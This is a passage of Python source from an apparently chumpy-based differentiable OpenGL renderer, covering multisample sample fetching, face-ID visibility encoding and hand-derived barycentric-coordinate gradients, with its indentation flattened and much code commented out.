# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
self.renders = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width']]).astype(np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:, :, 0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT), np.uint32).reshape(self.frustum['height'], self.frustum['width']).astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['width'], 3)[:, :, 0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate([self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:, :, 0:1]], 2)
self.renders_sample_barycentric[sample] = np.concatenate([self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:,:,0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0.,0.,0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
##Finally resolve the multisample renders into the output image and flag derivatives for recomputation
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes the camera is set up correctly in the current OpenGL context."""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
#Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f)+1)
fc = np.tile(fc.reshape((-1,1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8 ) & 255
fc[:, 2] = (fc[:, 2] >> 16 ) & 255
fc = np.asarray(fc, dtype=np.uint8)
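# The face index is packed into the 24-bit RGB color above, one byte per
# channel, so a rendered visibility image can be decoded back to face ids
# (a sketch, assuming the 8-bit unsigned channels set up here):
#   ids = raw[:, :, 0].astype(np.uint32) \
#       + (raw[:, :, 1].astype(np.uint32) << 8) \
#       + (raw[:, :, 2].astype(np.uint32) << 16)
# where ids == 0 marks background pixels (face numbering starts at 1).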
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1,3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
#Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1,2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:,:,0].ravel()[IS]
g = clr_im[:,:,1].ravel()[IS]
b = clr_im[:,:,2].ravel()[IS]
data = np.concatenate((r,g,b))
IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms+terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms+terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateRender:
render = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.updateRender = False
return self.render_result
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
derivatives_verts = self.compute_derivatives_verts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size // 3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size // 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch  # only needed by the commented-out autodiff check below
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # Check with autodiff:
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
# #
# # dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# # dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:,0:2]/p0[:,2:3]
p1_proj = p1[:,0:2]/p1[:,2:3]
p2_proj = p2[:,0:2]/p2[:,2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0]/p0[:, 2]
v = p0[:, 1]/p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:,None], np.zeros([len(p0),1]), (-p0[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p0),1]), p0[:, 2][:,None], (-p0[:,1]/v**2)[:,None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0]/p1[:, 2]
v = p1[:, 1]/p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:,None], np.zeros([len(p1),1]), (-p1[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p1),1]), p1[:, 2][:,None], (-p1[:,1]/v**2)[:,None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0]/p2[:, 2]
v = p2[:, 1]/p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:,None], np.zeros([len(p2),1]), (-p2[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p2),1]), p2[:, 2][:,None], (-p2[:,1]/v**2)[:,None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5*np.linalg.norm(np.cross(p1 - p0, p2 - p0),axis=1)
nt_mag = A*2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
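# Barycentric coordinates as scalar triple products: with unit normal
# nt_norm and ||nt|| = 2*A,
#   b0 = (nt_norm x (p2 - p1)) . (p - p1) / ||nt||
#   b1 = (nt_norm x (p0 - p2)) . (p - p2) / ||nt||
#   b2 = (nt_norm x (p1 - p0)) . (p - p0) / ||nt||
# i.e. each coordinate is the signed area of the sub-triangle opposite a
# vertex over the full triangle area. The derivatives below apply the
# product rule to the numerator and the 1/||nt|| factor separately, which
# is why each db*dp* term splits into a "part1" and a "part2".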
p = viewVerts
pre1 = -1/(nt_mag[:,None]**2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None,:],[len(p2),1,1])
dntdp0 = np.cross((p2-p0)[:,None,:], -ident) + np.cross(-ident, (p1-p0)[:,None,:])
dntdp1 = np.cross((p2-p0)[:,None,:],ident)
dntdp2 = np.cross(ident,(p1-p0)[:,None,:])
# Jacobian of the normalization n/||n||: d(n/||n||)/dn = (I - n_hat n_hat^T) / ||n||
dntnorm = (ident - np.einsum('ij,ik->ijk', nt_norm, nt_norm)) / nt_mag[:, None, None]
dntnormdp0 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:,None]
db0part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :],-ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0*b0
db0dp1wrtpart1 = dpart1p1*b0
db0dp2wrtpart1 = dpart1p2*b0
db0dp0wrtpart2 = 1./(nt_mag[:,None])*db0part2p0
db0dp1wrtpart2 = 1./(nt_mag[:,None])*db0part2p1
db0dp2wrtpart2 = 1./(nt_mag[:,None])*db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0-p2), -ident)
db1dp0wrtpart1 = dpart1p0*b1
db1dp1wrtpart1 = dpart1p1*b1
db1dp2wrtpart1 = dpart1p2*b1
db1dp0wrtpart2 = 1./(nt_mag[:,None])*db1part2p0
db1dp1wrtpart2 = 1./(nt_mag[:,None])*db1part2p1
db1dp2wrtpart2 = 1./(nt_mag[:,None])*db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0*b2
db2dp1wrtpart1 = dpart1p1*b2
db2dp2wrtpart1 = dpart1p2*b2
db2dp0wrtpart2 = 1./(nt_mag[:,None])*db2part2p0
db2dp1wrtpart2 = 1./(nt_mag[:,None])*db2part2p1
db2dp2wrtpart2 = 1./(nt_mag[:,None])*db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
#If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag<=1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = np.clip(vc, 0., 1.)
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:,None,:],dxdp_1[:,None,:],dxdp_2[:,None,:]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
#output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
#
return didp
def compute_image(self, visible, visibility, f):
"""Resolve the multisampled per-sample renders into the final image,
treating pixels on primitive boundaries separately from interior
pixels."""
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
# 4294967295 (np.uint32 max) marks pixels where no face is visible.
